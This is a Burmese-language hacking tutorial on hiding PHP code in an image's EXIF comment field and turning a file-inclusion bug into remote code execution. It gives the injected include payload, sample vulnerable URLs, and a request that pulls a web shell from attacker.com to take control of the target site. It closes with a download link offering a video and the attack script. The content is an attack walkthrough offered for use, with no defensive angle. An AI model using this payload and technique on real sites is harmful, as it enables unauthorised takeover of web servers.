
EXIF ဆိုတာကတော့ Exchangable File Format ကိုခေါ်တာပါ။ သူဟာ digital
camera တွေမှာသုံးတဲ့ file format တစ်ခုဖြစ်ပါတယ် သူ့ကို Japan Electronic
Industry Development Association (JEIDA) ကနေ create လုပ်ခဲ့တာပါ။
သူ့ကို JPEG, TIFF Rev, RIFF WAVE file format တွေမှာ meta data tag တွေနဲ့သုံးကြပါတယ်
ဟုတ်ပြီ အဲဒီ EXIF Data တွေကို Attacker (Hacker) တွေဟာသူတို့ရဲ့
Hacking တွေမှာဘယ်လိုအသုံးချကြလဲ။ ဘာကြောင့် Attacker (Hacker)
တွေဟာသူတို့ရဲ့ Hacking တွေမှာ အသုံးချနိုင်တာလဲဆိုတော့ ရိုးရိုးသာမန်
image တွေမှာ Attacker (Hacker) တွေဟာ PHP
coding တွေကို ထည့်သွင်းနိုင်လို့ပဲဖြစ်ပါတယ်။ ဒါပေမဲ့သတိပြုရမှာတစ်ခုကတော့
အဲဒီ image ကို browse လုပ်လိုက်ပြီး ကြည့်လိုက်ပေမဲ့ Attacker
ကထည့်သွင်းထားတဲ့ PHP code ကို process လုပ်မှာမဟုတ်ပါဘူး။
ဟုတ်ပြီအဲဒါဆို EXIF Data တွေဟာ Attacker (Hacker) တွေကို သူတို့ရဲ့
Hacking တွေပြုလုပ်ရာမှာဘယ်လိုအထောက်အကူပေးသလဲဆိုတာကြည့်လိုက်ကြရအောင်။
ဥပမာ Attacker (Hacker) ဟာ LFI vulnerable ဖြစ်တဲ့ site
တစ်ခုကိုတွေ့လိုက်တယ်ဆိုပါစို့။ ဒါဆိုသူ့အနေနဲ့ Server ပေါ်မှာရှိတဲ့ File
တွေကို access လုပ်လို့ပဲရဦးမယ်။ တကယ်လို့များသူဟာ
ဒီထပ်ပိုပြီးအသေးစိတ်သိချင်မယ် file တွေကို ဒီထပ်ပိုပြီး လွယ်လွယ်ကူကူနဲ့
access လုပ်ချင်မယ်ဆိုရင်တော့ သူ့အတွက် Shell Script တစ်ခုလိုလာပါပြီ။
အဲဒါဆိုရင်သူဟာ LFI vulnerability ကနေ RFI vulnerability
ဖြစ်အောင်ကျိုးစားရပါတော့မယ်။ တကယ်လို့များ အဲဒီ site ဟာ image တွေကို
upload ပေးလုပ်တယ်ဆိုရင်တော့သူ့အတွက်ကြိုးစားဖို့အခွင့်အရေး
အများကြီးရှိသွားပါပြီ။
ဒါဆိုရင်တော့သူဟာ သူ့ရဲ့ image file ထဲမှာ အောက်မှာပြထားတဲ့ RFI vulnerable ဖြစ်တဲ့ PHP Script ကိုထည့်သွင်းနိုင်ပါတယ်။
<? @include($_GET['shell']); ?>
အဲဒီ PHP Script ကို image ရဲ့ comment ထဲမှာထည့်သွင်းပါလိမ့်မယ်။
ပြီးရင်တော့ အဲဒီ image ကို site ရဲ့ vulnerability ကနေတဆင့် ခေါ်ယူဖို့ကြိုးစားပါလိမ့်မယ်။
ဥပမာ အဲဒီ site ရဲ့ vulnerable ဖြစ်တဲ့ URL String ဟာအောက်မှာဖော်ပြထားတဲ့အတိုင်းပဲဖြစ်တယ်ဆိုကြပါ စို့။
http://site.com/index.php?page=page.php
Attacker (Hacker) upload လုပ်လိုက်တဲ့ image ဟာ images ဆိုတဲ့ path
ထဲမှာ 1.jpg အနေနဲ့ရောက်ရှိသွားတယ်ဆိုပါစို့။ ဒါဆို Attacker (Hacker)
ကဒီလိုမျိုးကြိုးပမ်းနိုင်ပါတယ်။
http://site.com/index.php?page=1.jpg
ဒါပေမဲ့တကယ့် image ကိုမြင်ရမှာမဟုတ်ပါဘူး အဲဒီနေရာမှာ image
ထဲမှာထည့်သွင်းထားတဲ့ RFI vulnerability ကနေတဆင့် Attacker (Hacker) ရဲ့
site မှာထည့်သွင်းထားတဲ့ Shell Script ကိုခေါ်ရမှာဖြစ်ပါတယ်။
http://site.com/index.php?page=1.jpg&shell=http%3A%2F%2Fattacker.com%2Fshell.php
ဒါဆိုရင်တော့ site.com ကို Attacker ရဲ့ site က shell.php ကိုအသုံးပြုပြီး ကြိုက်သလိုထိန်းချုပ်လို့ရသွားပါပြီ
movie tutorial ကြည့်ချင်သူတွေအတွက် movie + script
http://shrta.com/files/YWFNZYV5/exif.rar
source - Ghost Area